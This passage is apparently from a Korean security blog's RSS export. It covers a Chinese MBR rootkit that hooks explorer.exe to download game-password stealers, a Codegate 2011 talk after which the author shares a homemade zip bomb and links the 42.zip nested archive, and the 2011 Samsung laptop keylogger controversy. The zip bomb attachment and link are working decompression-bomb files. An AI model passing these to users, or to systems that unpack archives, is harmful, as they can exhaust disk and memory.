&lt;div&gt;360&lt;/div&gt;
&lt;div&gt;Kingsoft&lt;/div&gt;
&lt;div&gt;Keniu Network technology&lt;/div&gt;
&lt;div&gt;Beijing Jiangmin or Qizhi Software (여기까지 중국 제품)&lt;/div&gt;
&lt;div&gt;AVG&lt;/div&gt;
&lt;div&gt;BitDefender&lt;/div&gt;
&lt;div&gt;symantec&lt;/div&gt;
&lt;div&gt;kaspersky&lt;/div&gt;
&lt;div&gt;ESET&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
루트킷은 악성코드를 배포하는 플랫폼으로 쓰이고 explorer.exe 프로세스를 후킹해서 원격 서버와 통신할 다운로더 컴포넌트를 삽입하고 다운로더 컴포넌트는 Trojan-Dropper.Win32.Vedio.dgs와 Trojan-GameThief.Win32.OnLineGames.boas라는 탐지명으로 명명된 악성코드들을 다운로드합니다.&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
눈치채셨겠지만 다운로더가 다운로드하는 &lt;b&gt;악성코드는 게임 패스워드 스틸러&lt;/b&gt;입니다.&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
코드게이트 트레이닝코스에서 FSK의 노용환 팀장님이 강의하셨던 MBR Rootkit이 생각나는군요.&lt;/div&gt;
&lt;div&gt;(재미는 있었는데 중반부터는...ㅜ.ㅜ)&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-140-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-140-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-140-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/140&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>bootkit</category>
			<category>MBR</category>
			<category>Rootkit</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/140</guid>
			<comments>http://malwarelab.tistory.com/entry/New-Chinese-MBR-Rootkit-Identified#entry140comment</comments>
			<pubDate>Wed, 06 Apr 2011 17:36:18 +0900</pubDate>
		</item>
		<item>
			<title>Codegate 2011 Bryan Sullivan의 강연</title>
			<link>http://malwarelab.tistory.com/entry/Codegate-2011-Bryan-Sullivan%EC%9D%98-%EA%B0%95%EC%97%B0</link>
			<description>&lt;br /&gt;
&lt;br /&gt;오늘 들었던 트랙 중 젤 재밌게 들었습니다.&lt;br /&gt;
후기는 바라지 마시구요 -_-;;&lt;br /&gt;
내용 정리되면 포스팅하겠습니다.&lt;br /&gt;
&lt;br /&gt;오늘 강연 중에 집에 와서 바로 해보고 싶었던게 Zip Bomb이었습니다.&lt;br /&gt;
그래서 해봤습니다. ;-)&lt;br /&gt;
이거 상당히 재밌군..&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile4.uf@2047FF484D9B2A09326750.zip&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/blog/image/extension/zip.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; 3.zip&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;3.zip은 3.txt를 압축한 파일입니다.&lt;br /&gt;
&lt;br /&gt;3.zip은 1,226,633 바이트&lt;br /&gt;
3.txt는 224,638,596 바이트&lt;br /&gt;
&lt;br /&gt;궁금하시면 받아서 압축 풀어보세요 ㅎㅎ&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;참고 사이트&lt;br /&gt;
&lt;A href=&quot;http://www.unforgettable.dk/&quot;&gt;http://www.unforgettable.dk/&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;FONT face=Verdana&gt;Click here to download &lt;/FONT&gt;&lt;A href=&quot;http://www.unforgettable.dk/42.zip&quot;&gt;&lt;FONT face=Verdana&gt;42.zip&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=Verdana&gt;(42.374 bytes zipped)&lt;br /&gt;
&lt;br /&gt;The file contains 16 zipped files, which again contains 16 zipped files, which again contains 16 zipped files, which again contains 16 zipped, which again contains 16 zipped files, which contain 1 file, with the size of 4.3GB.&lt;br /&gt;
&lt;br /&gt;So, if you extract all files, you will most likely run out of space :-)&lt;br /&gt;
&lt;br /&gt;&lt;/FONT&gt;&lt;TT&gt;&lt;PRE&gt;16 x 4294967295       = 68.719.476.720 (68GB)
16 x 68719476720      = 1.099.511.627.520 (1TB)
16 x 1099511627520    = 17.592.186.040.320 (17TB)
16 x 17592186040320   = 281.474.976.645.120 (281TB)
16 x 281474976645120  = 4.503.599.626.321.920 (4,5PB)
&lt;/PRE&gt;&lt;/TT&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-139-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-139-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-139-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/139&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0xFF small talk</category>
			<category>42.zip</category>
			<category>zip bmomb</category>
			<category>오호호호~</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/139</guid>
			<comments>http://malwarelab.tistory.com/entry/Codegate-2011-Bryan-Sullivan%EC%9D%98-%EA%B0%95%EC%97%B0#entry139comment</comments>
			<pubDate>Tue, 05 Apr 2011 23:44:27 +0900</pubDate>
		</item>
		<item>
			<title>Samsung installs keylogger on its laptop computers</title>
			<link>http://malwarelab.tistory.com/entry/Samsung-installs-keylogger-on-its-laptop-computers</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;논란의 중심에 있던 VIPRE 제작사인 GFI LABS에서 공식 입장을 밝혔습니다.&lt;br /&gt;
&lt;br /&gt;&lt;/STRONG&gt;&lt;A href=&quot;http://sunbeltblog.blogspot.com/2011/03/samsung-laptops-do-not-have-keylogger.html&quot;&gt;&lt;STRONG&gt;http://sunbeltblog.blogspot.com/2011/03/samsung-laptops-do-not-have-keylogger.html&lt;/STRONG&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;제목으로 완전 종결을 짓네요...&lt;br /&gt;
&lt;br /&gt;삼성 랩탑은 키로거가 없다. 우리 잘못이다..&lt;br /&gt;
&lt;br /&gt;머...끝난거겠죠?&lt;br /&gt;
&lt;/STRONG&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
지금 한참 난리가 난 판국이니 다들 아실텐데요..&lt;br /&gt;
&lt;br /&gt;R525와 R540에서 키로거가 발견되었다고 합니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
networkworld에 실린 최초(?) 글&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://www.networkworld.com/newsletters/sec/2011/032811sec2.html&quot;&gt;http://www.networkworld.com/newsletters/sec/2011/032811sec2.html&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;Sony BMG rootkit 사례를 들면서 이야기가 시작됩니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
그리고 눈에 띄는 문장&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile3.uf.tistory.com/original/1375B83D4D9402301D8187&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile3.uf.tistory.com/image/1375B83D4D9402301D8187&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;ss1.png&quot; height=&quot;348&quot; width=&quot;674&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;삼성에서는 공식 블로그를 통해 삼성 노트북은 안전하다고 발표했습니다.&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://samsungtomorrow.com/1070&quot;&gt;http://samsungtomorrow.com/1070&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
사실일까요?&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile2.uf.tistory.com/original/116F793E4D9403510B9285&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile2.uf.tistory.com/image/116F793E4D9403510B9285&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;ss2.png&quot; height=&quot;664&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;최초 글에서 Hassan이 고객센터에서의 대화 내용까지 공개했었습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;The supervisor who spoke with me was not sure how this software ended up in the new laptop thus put me on hold. He confirmed that yes, Samsung did knowingly put this software on the laptop to, as he put it, &quot;monitor the performance of the machine and to find out how it is being used.&quot;&lt;br /&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&lt;br /&gt;
번역하자면 고객지원 담당자는 이 소프트웨어(키로거)를 노트북에&amp;nbsp;포함하였으며, &quot;기기의 성능을 모니터링하고 어떻게 사용하는지 파악하기 위해서&quot;라고 이유를 설명했습니다.&lt;br /&gt;
&lt;br /&gt;이런 응대를 했던 직원은 당장 짤릴게 뻔하군요..&lt;br /&gt;
&lt;br /&gt;삼성에서는 확인 중이라고 하는데 어떤 결과가 나올지 대충 짐작은 갑니다.&lt;br /&gt;
&lt;br /&gt;&quot;직원의 실수였다..&quot;&lt;br /&gt;
&quot;대화 중 의미가 와전된 것 같다..&quot;&lt;br /&gt;
등등&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
머 아무튼 피바람 한번 불겠군요..&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-138-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-138-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-138-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/138&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
